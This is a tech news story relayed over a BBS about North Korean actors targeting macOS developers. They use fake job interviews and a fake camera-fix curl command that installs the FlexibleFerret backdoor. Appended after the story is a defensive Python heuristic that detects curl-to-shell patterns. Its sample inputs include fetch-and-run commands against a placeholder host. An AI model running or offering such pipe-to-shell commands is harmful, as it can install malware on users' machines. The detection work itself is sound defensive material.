• New macOS malware chain could cause a major security headache - h

    From TechnologyDaily@1337:1/100 to All on Wednesday, November 26, 2025 18:45:10
    New macOS malware chain could cause a major security headache - here's what
    we know

    Date:
    Wed, 26 Nov 2025 18:33:00 +0000

    Description:
    North Korean hackers are targeting macOS devs now with fake jobs and a ClickFix approach.

    FULL STORY
    ======================================================================
    - Jamf reports North Korean actors using fake job ads and ClickFix tactics to target macOS users
    - Victims are tricked into running curl commands in Terminal, installing FlexibleFerret backdoor malware
    - The campaign, dubbed Contagious Interview, enables credential theft, file exfiltration, and system compromise

    North Korean state-sponsored threat actors are targeting macOS users with new malware, utilizing a strategy that combines two popular approaches - fake
    job ads, and ClickFix, experts have warned.

    Security researchers at Jamf confirmed they have spotted attacks in the wild using ClickFix, an attack method in which the victim is presented with a fake problem and, at the same time, with a fix. It is an evolution of
    the old "You have a virus" popup that dominated the internet in the early
    2000s.

    Jamf says DPRK-aligned operators from the FlexibleFerret malware family have been creating fake companies, fake LinkedIn profiles and, most importantly, fake job ads, as part of a wider campaign called Contagious Interview.

    Curl commands and fake fixes

    Victims, mostly software developers, would either discover these websites and job ads by themselves, or would be invited for interviews via LinkedIn.

    After jumping through multiple hoops, the victims would then be asked to record a video of themselves through the employer's platform, but when they
    tried to do so, the platform would tell them that their camera isn't working properly.

    They would then be presented with a fix - a curl command to be entered into Terminal - which doesn't fix the problem but rather introduces malware to the system.

    This malware, essentially a backdoor, does a couple of things - generates a short machine identifier, checks for duplicates, and then pulls additional commands from a hard-coded command server.

    Those commands include collecting system information, uploading or
    downloading files, executing shell commands, pulling Chrome profile data, or triggering an automated credential theft.

    "Organizations should treat unsolicited interview assessments and Terminal-based fix instructions as high-risk, and ensure users know to stop and report these prompts rather than follow them," the researchers concluded.
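
A defender-side check for the pattern described above, as an added example that is not from the article or from Jamf: it flags pasted Terminal one-liners in which curl output is piped into an interpreter, or saved to a file that is used again in the same line. The sample commands, the example.invalid host and the function names are constructed for illustration.

```python
import os
import re
import shlex

INTERPRETERS = {"sh", "bash", "zsh", "python3", "osascript"}

def split_stages(command):
    """Return [(separator_before, argv), ...] for a shell one-liner."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars="|&;")
    lexer.whitespace_split = True
    lexer.commenters = ""  # do not treat '#' in a URL as a comment
    stages, sep, argv = [], "", []
    for tok in lexer:
        if tok in {"|", "||", "&&", ";", "&"}:
            if argv:
                stages.append((sep, argv))
            sep, argv = tok, []
        else:
            argv.append(tok)
    if argv:
        stages.append((sep, argv))
    return stages

def saved_path(argv):
    """Path given to curl -o / --output (also bundled, e.g. -fsSLo)."""
    for flag, value in zip(argv, argv[1:]):
        if flag == "--output" or re.fullmatch(r"-[A-Za-z]*o", flag):
            return value
    return None

def classify(command):
    """Return the reasons a pasted command looks like fetch-and-run."""
    reasons, stages = [], split_stages(command)
    for i, (_, argv) in enumerate(stages):
        if os.path.basename(argv[0]) != "curl":
            continue
        later = stages[i + 1:]
        if later and later[0][0] == "|" and os.path.basename(later[0][1][0]) in INTERPRETERS:
            reasons.append("curl output piped into " + os.path.basename(later[0][1][0]))
        path = saved_path(argv)
        if path and any(path in nxt for _, nxt in later):
            reasons.append("file saved by curl is reused in the same line: " + path)
    return reasons

SAMPLES = [  # constructed inputs; example.invalid never resolves
    'curl -fsSL "https://host.example.invalid/fix.sh" | bash',
    "curl -fsSLo /tmp/fix.sh https://host.example.invalid/u && chmod +x /tmp/fix.sh && /tmp/fix.sh",
    "curl -I https://host.example.invalid/status",
]
```

This is a triage heuristic for command text such as shell history or process arguments; it does not look past wrappers such as sudo.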




    ======================================================================
    Link to news story: https://www.techradar.com/pro/security/new-macos-malware-chain-could-cause-a-major-security-headache-heres-what-we-know


    --- Mystic BBS v1.12 A49 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)